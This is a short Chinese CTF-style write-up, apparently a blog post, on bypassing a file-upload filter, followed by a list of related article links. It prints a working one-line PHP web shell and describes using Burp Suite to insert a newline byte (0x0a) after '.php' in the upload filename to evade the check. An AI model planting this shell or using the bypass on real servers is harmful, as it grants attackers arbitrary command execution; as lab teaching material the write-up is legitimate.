Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
zbtlink4 分钟前
Wi-Fi 6路由器技术成熟度解析:它究竟“新”在哪里?HelloWorld1024!27 分钟前
C++中链表的虚拟头结点:应用场景与使用时机久违 °31 分钟前
【安全开发】Nmap主机探测技术详解(一)缘木之鱼31 分钟前
CTFshow __Web应用安全与防护 第一章txinyu的博客33 分钟前
DNS 协议小小代码狗41 分钟前
【无标题】qq_3363139344 分钟前
java基础-网络编程-UDP2301_780789661 小时前
游戏行业抗 DDoS 方案:高并发场景下的 CC 攻击拦截与体验平衡乾元1 小时前
范式转移:从基于规则的“特征码”到基于统计的“特征向量”txinyu的博客1 小时前
手写 C++ 高性能 Reactor 网络服务器